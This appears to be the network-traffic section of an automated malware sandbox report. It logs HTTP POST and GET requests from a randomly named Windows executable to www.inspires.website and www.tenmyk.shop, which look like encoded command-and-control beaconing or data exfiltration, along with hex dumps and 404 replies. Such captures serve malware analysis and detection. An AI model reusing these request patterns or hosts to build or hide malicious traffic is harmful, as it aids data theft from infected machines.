                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      18          192.168.2.5  50000        203.161.49.193  80                1896  C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      Timestamp                            Bytes transferred  Direction  Data
                                                                                                      Nov 18, 2024 13:55:07.971286058 CET  772                OUT        POST /tv3i/ HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.inspires.website
                                                                                                      Referer: http://www.inspires.website/tv3i/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 6c 79 43 74 69 6b 76 44 67 37 77 30 4a 63 48 73 4c 4c 31 78 59 47 71 6c 6e 56 31 67 4d 49 37 35 67 73 46 2f 75 62 51 4f 61 59 6b 7a 66 2b 41 71 6e 61 32 4f 50 49 77 70 38 68 53 52 72 4e 78 71 4f 34 55 71 42 78 61 77 6b 64 7a 65 39 7a 2f 4d 4b 4c 6c 55 75 41 58 49 78 4a 49 56 57 33 6c 71 76 34 50 38 41 4a 2b 51 71 67 42 47 6a 55 65 52 76 52 57 4b 72 64 42 6a 55 55 52 36 5a 6d 6e 43 62 59 66 75 72 38 30 39 2b 6c 2b 63 6b 79 30 2b 5a 39 43 32 6a 6c 75 33 30 64 6a 52 4a 43 59 68 55 35 31 42 4d 79 6a 76 75 71 48 75 38 33 70 75 72 36 4b 4b 46 6f 67 2b 43 34 31 6b 72 54 64 55 72 44 34 78 62 2f 41 54 78 4d 74 43 2f 50 2f 4e 52 4e 57 7a 72 55 41 65 61 4e 64 4c
                                                                                                      Data Ascii: 3Vh=lyCtikvDg7w0JcHsLL1xYGqlnV1gMI75gsF/ubQOaYkzf+Aqna2OPIwp8hSRrNxqO4UqBxawkdze9z/MKLlUuAXIxJIVW3lqv4P8AJ+QqgBGjUeRvRWKrdBjUUR6ZmnCbYfur809+l+cky0+Z9C2jlu30djRJCYhU51BMyjvuqHu83pur6KKFog+C41krTdUrD4xb/ATxMtC/P/NRNWzrUAeaNdL
Timestamp: Nov 18, 2024 13:55:08.683794022 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:08 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 50001 | Destination IP: 203.161.49.193 | Destination Port: 80 | PID: 1896
Process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp: Nov 18, 2024 13:55:10.517643929 CET | Bytes transferred: 1789 | Direction: OUT | Data:
POST /tv3i/ HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.inspires.website
                                                                                                      Referer: http://www.inspires.website/tv3i/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 6c 79 43 74 69 6b 76 44 67 37 77 30 4a 63 48 73 4c 4c 31 78 59 47 71 6c 6e 56 31 67 4d 49 37 35 67 73 46 2f 75 62 51 4f 61 5a 63 7a 66 4e 34 71 6e 37 32 4f 64 59 77 70 69 52 53 71 72 4e 78 33 4f 34 63 75 42 78 66 48 6b 66 4c 65 38 52 33 4d 49 36 6c 55 39 67 58 49 2b 70 49 59 4f 58 6c 46 76 38 53 33 41 4a 75 51 71 67 42 47 6a 53 61 52 6f 44 2b 4b 74 64 42 67 46 55 52 2b 55 47 6d 74 62 59 48 51 72 36 6f 74 35 55 65 63 6a 53 6b 2b 66 50 36 32 6c 31 75 35 36 39 6a 67 4a 43 46 2f 55 36 41 34 4d 78 2f 4a 75 74 4c 75 39 68 78 77 77 65 2b 76 61 4b 46 64 4d 5a 70 58 7a 46 30 74 76 79 41 44 54 66 55 65 31 76 39 68 31 36 6a 4f 54 38 44 46 32 6a 55 51 51 4b 30 2b 6f 38 33 43 67 51 6d 75 42 2b 6d 52 67 68 76 6c 4f 50 50 4a 55 42 36 2b 78 4d 67 55 39 2b 71 69 44 64 6a 79 35 5a 45 45 47 74 69 39 62 71 41 64 78 57 33 77 6d 52 6e 6c 56 77 59 6d 48 67 68 4b 33 57 30 37 34 61 70 32 4c 47 36 4c 55 30 76 68 30 74 5a 2f 6c 76 44 52 73 4e 47 43 4a 35 53 49 71 33 41 67 4b 6f 30 64 76 7a 57 39 58 78 61 32 39 71 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=lyCtikvDg7w0JcHsLL1xYGqlnV1gMI75gsF/ubQOaZczfN4qn72OdYwpiRSqrNx3O4cuBxfHkfLe8R3MI6lU9gXI+pIYOXlFv8S3AJuQqgBGjSaRoD+KtdBgFUR+UGmtbYHQr6ot5UecjSk+fP62l1u569jgJCF/U6A4Mx/JutLu9hxwwe+vaKFdMZpXzF0tvyADTfUe1v9h16jOT8DF2jUQQK0+o83CgQmuB+mRghvlOPPJUB6+xMgU9+qiDdjy5ZEEGti9bqAdxW3wmRnlVwYmHghK3W074ap2LG6LU0vh0tZ/lvDRsNGCJ5SIq3AgKo0dvzW9Xxa29qX9vUBEsKVPd3Mi8SLRCk0nV/ObHigvSC38pngOF4lce/uat4b/a0cII9hNQ2vh/bGszYBjruly+pI+LBKt9osV/x+tOLH7ALURr3D6YkjVIjP8eDN+DstEsmHXlKArDAvhCeDkI8TXtVRi/9Kl75W3zBaY9nfnYbhxE4g7m6ZNvDGnt/WsuVCYHjt2Iu29oBGbZmikiJN0Dz7SkLqmON75qaPyonmJfy9iwrN8/Joz0PG8dZ+ZKd44gZnkovb+EZ5vZCCmRQM2+5k2agK5I0+fURCOrVXVIn6Go9ORBcC6nzHUCCZLDPkFMQXFjksg55RQeTLVhNP7ErmNnDJ/96kG68mOHG978/4uAxIzSBTDM+1scDVSXrMNt0Iw23b7qTu/gsGQzBdniu7gOVqaaz+VolvPxOOAQcgeVtgpamTiRuXPvXF0UY9ARbzBBUB58OIhIf4f/wlirRZmc0lq33e2NBb/08HEO09hdMXW+MfdahKTytSk4hN4w3DPtllY1F7WeDr7g0Pmihcr3BHiewkIFEKyp/zoGuA6/gTRnE4BnIigk1/wt4HSRQB1v1+rpDmXcyta+7tfx3vo7WZtq94UzMbB6EVY0ygJdII32Pl2O1RZkbSwh9fKMPEBqVI+INllOf6zfBJtZHO3qmk/XclE2NmBxniuWC5k [TRUNCATED]
Timestamp: Nov 18, 2024 13:55:11.227847099 CET | Bytes transferred: 533 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:11 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 50002 | Destination IP: 203.161.49.193 | Destination Port: 80 | PID: 1896
Process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp: Nov 18, 2024 13:55:13.062254906 CET | Bytes transferred: 489 | Direction: OUT | Data:
GET /tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
Timestamp: Nov 18, 2024 13:55:13.767194033 CET | Bytes transferred: 548 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:13 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 50003 | Destination IP: 104.21.74.79 | Destination Port: 80 | PID: 1896
Process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp: Nov 18, 2024 13:55:18.863425016 CET | Bytes transferred: 737 | Direction: OUT | Data:
POST /qpp1/ HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.tenmyk.shop
                                                                                                      Referer: http://www.tenmyk.shop/qpp1/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 57 50 4a 2b 38 30 44 52 59 49 74 72 47 4e 73 30 38 71 73 4d 71 57 32 75 65 66 70 56 61 39 43 58 2f 48 52 53 4a 4e 59 63 7a 2f 33 4e 6f 71 41 65 36 4c 34 78 6e 52 34 7a 35 4b 51 75 56 77 53 48 78 77 75 7a 54 78 54 75 56 34 31 4c 78 33 50 71 6d 53 63 61 35 58 76 36 58 6b 63 6f 6f 75 61 65 75 64 65 69 59 39 46 44 30 6a 51 4e 64 50 68 52 56 6d 79 47 30 46 51 62 6a 5a 71 55 79 76 66 6b 2f 50 53 6d 49 74 34 65 6e 38 5a 65 36 43 75 6e 31 4c 74 74 32 4d 6e 32 79 74 46 55 56 70 76 62 48 74 6f 77 42 78 76 52 35 33 55 4b 42 5a 5a 4a 43 4a 4b 74 69 76 62 2b 68 39 36 61 73 57 42 79 33 50 61 4e 48 7a 30 3d
                                                                                                      Data Ascii: 3Vh=WPJ+80DRYItrGNs08qsMqW2uefpVa9CX/HRSJNYcz/3NoqAe6L4xnR4z5KQuVwSHxwuzTxTuV41Lx3PqmSca5Xv6XkcoouaeudeiY9FD0jQNdPhRVmyG0FQbjZqUyvfk/PSmIt4en8Ze6Cun1Ltt2Mn2ytFUVpvbHtowBxvR53UKBZZJCJKtivb+h96asWBy3PaNHz0=


Session ID: 22 | Source IP: 192.168.2.5 | Source Port: 50004 | Destination IP: 104.21.74.79 | Destination Port: 80 | PID: 1896
Process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp: Nov 18, 2024 13:55:21.405524015 CET | Bytes transferred: 757 | Direction: OUT | Data:
POST /qpp1/ HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.tenmyk.shop
                                                                                                      Referer: http://www.tenmyk.shop/qpp1/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 57 50 4a 2b 38 30 44 52 59 49 74 72 47 74 38 30 77 72 73 4d 39 6d 32 76 43 76 70 56 4d 4e 43 54 2f 48 56 53 4a 4d 74 58 7a 74 6a 4e 6f 4c 51 65 67 4f 55 78 6b 52 34 7a 79 71 51 76 52 77 53 63 78 77 69 52 54 31 54 75 56 37 4a 4c 78 32 2f 71 6d 6c 41 5a 34 48 76 34 50 55 63 75 31 65 61 65 75 64 65 69 59 39 42 35 30 6a 49 4e 63 36 78 52 55 48 79 48 36 6c 51 59 71 35 71 55 6c 2f 66 67 2f 50 53 41 49 6f 68 78 6e 2b 68 65 36 44 65 6e 77 4f 52 75 38 4d 6e 77 32 74 45 6b 56 4b 47 41 50 37 38 6b 63 6e 71 43 6a 52 6c 72 41 76 6f 6a 59 72 43 46 78 50 33 47 78 75 79 74 39 6d 67 62 74 73 4b 39 5a 6b 68 53 46 36 61 31 6f 79 4a 75 41 35 45 39 66 4b 39 78 59 35 33 45
                                                                                                      Data Ascii: 3Vh=WPJ+80DRYItrGt80wrsM9m2vCvpVMNCT/HVSJMtXztjNoLQegOUxkR4zyqQvRwScxwiRT1TuV7JLx2/qmlAZ4Hv4PUcu1eaeudeiY9B50jINc6xRUHyH6lQYq5qUl/fg/PSAIohxn+he6DenwORu8Mnw2tEkVKGAP78kcnqCjRlrAvojYrCFxP3Gxuyt9mgbtsK9ZkhSF6a1oyJuA5E9fK9xY53E
Timestamp: Nov 18, 2024 13:55:22.916084051 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-litespeed-tag: 3d9_HTTP.404
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      link: <https://tenmyk.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                      x-litespeed-cache-control: no-cache
                                                                                                      vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkunI7DZZ%2FqdJCgZNv95YCgaZuMrjcFlpnDSXFBAxX7vXbaTCd%2FDTxBG7V2EetXO7f4qxUP63pn1TNX5OJbcFihpCgzrW9rwuocCfToDH2EnoRijBYiXsBnoZo7N9nBjCRo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481d4a0fe16c80-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 64 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 89 a0 a1 0f b7 4d 87 4c 66 72 ec 51 99 71 2a 4e 6a 6b cb 76 a5 d4 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 fa a0 0f c7 5e ef ce 3a 95 04 9e de ad 77 49 f8 e5 f1 db cb 37 9f ff f9 f1 9d 31 56 59 fa ea e8 a5 fe cf 48 31 4b 42 13 98 f3 e5 ca 34 72 01 31 9d 85 26 4f 02 63 ac 54 2e 83 76 9b 27 b9 9b 41 9b c9 13 d3 88 52 2c 65 68 a6 1c 13 ca 12 47 52 05 06 e3 ce 9d 34 35 3b c0 e4 d5 d1 0f 2f 33 50 d8 88 c6 58 48 50 a1 f9 e5 f3 7b e7 dc 34 da 7a 25 a5 ec de 10 90 86 66 2e 78 4c 53 30 8d b1 80 38 34 b5 ac a0 dd 4e b2 3c 71 b9 48 da b3 98 b5
                                                                                                      Data Ascii: dc2is8W`\MLfrQq*NjkvADo^:wI71VYH1KB4r1&OcT.v'AR,ehGR45;/3PXHP{4z%f.xLS084N<qH
Timestamp: Nov 18, 2024 13:55:22.916368961 CET | Bytes transferred: 212 | Direction: IN | Data Raw: 7d 7f 9f 8a b2 64 84 a3 fb 26 99 56 51 01 cb e6 f7 ae 1c f3 bc 3d cb 52 91 47 6e 3e ce 2b f2 a3 1f f4 cf 4b 19 09 9a ab 57 84 47 45 06 4c b9 ab 87 77 29 54 ef 95 61 bf e3 0c 8c d0 78 02 d2 0b e3 d4 98 83 74 ee a4 71 27 bf e2 48 d1 09 18 77 f2 f4
                                                                                                      Data Ascii: }d&VQ=RGn>+KWGELw)Taxtq'Hwe{)))=n/[<XQQS0AhN(Ls.iD)`*4qH`B#pdPF##BX{WE4620.sE3kcVcY
Timestamp: Nov 18, 2024 13:55:22.916515112 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: c0 ec 3e c3 6a ec 46 3c 6b 1b 8e f3 ea e8 a5 a2 2a 85 57 1f 71 02 c6 ef 5c 19 ef 79 c1 88 e1 18 6a 0c a2 88 e3 14 88 e0 5c 2a 10 2f db 35 e6 96 05 82 8f b8 92 0d fd 63 9e a6 7c 8a 0c c6 29 23 30 33 db 2b fc 5c f0 1c 84 9a 57 f1 9b 72 6d 4a 83 0c
                                                                                                      Data Ascii: >jF<k*Wq\yj\*/5c|)#03+\WrmJW<obhZ6!N:j;G\DMR Ea1bW$}u_<QkG#1d|0_Wf[/7:8|]H`~"5%f+"i|xV
Timestamp: Nov 18, 2024 13:55:22.917190075 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: be 67 07 d4 8d 04 60 05 cb 81 da 32 eb 2c 30 6d 84 43 a1 93 e6 4d 7d 02 b2 cc 0e 31 d1 62 4a d3 f4 13 60 f2 5e c0 bf 0a 60 2a 9d 07 c7 5e 69 23 1e 5a d8 d5 78 bf 62 09 29 65 ba b7 e8 11 1a bb 31 d7 a7 b5 33 cf 33 ba 9d 7c 66 fc 22 28 4e 4d b4 28
                                                                                                      Data Ascii: g`2,0mCM}1bJ`^`*^i#Zxb)e133|f"(NM(n;e/5^>f+ER.Dx!90fLSb)<gTBeD2-#1wYeSE)AU9\@]L0O6XZp
Timestamp: Nov 18, 2024 13:55:22.917202950 CET | Bytes transferred: 424 | Direction: IN | Data Raw: 66 4f c8 e0 02 eb dd e8 e1 fe c5 16 7b a6 03 4a 77 84 67 eb de ed 7a 17 67 e7 e8 a4 eb 47 24 8a b7 98 67 94 b0 55 c0 3e 2b 7a 3a 5e f7 dc 47 27 9d f3 41 2f 8e ec b2 62 2a 20 29 52 2c 36 59 bb 58 3f 05 3e 64 35 52 f5 e5 ee 30 4e c7 3d eb f4 57 78
                                                                                                      Data Ascii: fO{JwgzgG$gU>+z:^G'A/b* )R,6YX?>d5R0N=WxuQ87z,5E?gtWe$!{)~'.GB5[-Vn[-nWsWHEc~n8#j`sde.zmA>qmn}rr"Ji
Timestamp: Nov 18, 2024 13:55:22.917213917 CET | Bytes transferred: 213 | Direction: IN | Data Raw: 7c 4f ff 94 d5 2f e6 04 d3 31 08 b0 aa dc 58 ce 17 95 d2 f6 62 f9 56 4d 90 81 e4 29 25 5b 14 d7 d5 c2 4f e1 12 4d f1 bc 26 bc 5d 53 6a d0 13 a9 ab f8 dd a5 af 81 4f e4 30 e2 4a f1 6c 97 c5 12 fa 44 1e da f5 bb 1c 2a d8 13 e9 2b 57 df 3e c7 73 3b
                                                                                                      Data Ascii: |O/1XbVM)%[OM&]SjO0JlD*+W>s;vzfu+?{wnE32<s9y?K&{v,SFs9Fi,cjQk^3bXu<_}7


Session ID: 23 | Source IP: 192.168.2.5 | Source Port: 50005 | Destination IP: 104.21.74.79 | Destination Port: 80 | PID: 1896
Process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Timestamp: Nov 18, 2024 13:55:23.955598116 CET | Bytes transferred: 1774 | Direction: OUT | Data:
POST /qpp1/ HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.tenmyk.shop
                                                                                                      Referer: http://www.tenmyk.shop/qpp1/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 57 50 4a 2b 38 30 44 52 59 49 74 72 47 74 38 30 77 72 73 4d 39 6d 32 76 43 76 70 56 4d 4e 43 54 2f 48 56 53 4a 4d 74 58 7a 74 37 4e 6f 35 49 65 36 70 41 78 6c 52 34 7a 78 71 51 71 52 77 54 4d 78 7a 53 56 54 31 58 2b 56 2b 4e 4c 77 56 33 71 6b 58 6f 5a 32 48 76 34 54 6b 63 72 6f 75 61 4c 75 64 4f 6d 59 2b 70 35 30 6a 49 4e 63 39 4a 52 43 6d 79 48 34 6c 51 62 6a 5a 71 75 79 76 66 49 2f 50 4b 2b 49 6f 74 62 6e 4e 70 65 37 67 32 6e 79 59 46 75 36 63 6e 79 37 4e 45 38 56 4b 61 6c 50 2f 63 53 63 6e 33 5a 6a 57 4a 72 43 65 5a 48 47 36 65 46 72 66 69 6e 7a 64 6d 41 74 47 55 36 6c 36 57 4a 55 6e 35 78 43 4a 75 62 76 43 31 45 43 61 6f 31 42 4d 41 72 63 38 32 76 67 76 73 7a 52 77 68 78 70 4e 61 39 4d 76 4b 4a 45 6d 44 79 70 77 58 68 75 4b 4b 2f 41 78 67 34 61 4e 69 43 77 36 54 38 53 56 61 41 33 47 33 6f 66 71 31 56 78 44 78 6d 73 73 47 41 30 44 72 77 6a 4c 5a 6c 6b 42 34 49 64 6f 6e 74 51 4b 74 77 48 62 7a 57 34 58 36 41 79 41 6b 72 69 6c 56 50 42 38 67 6f 36 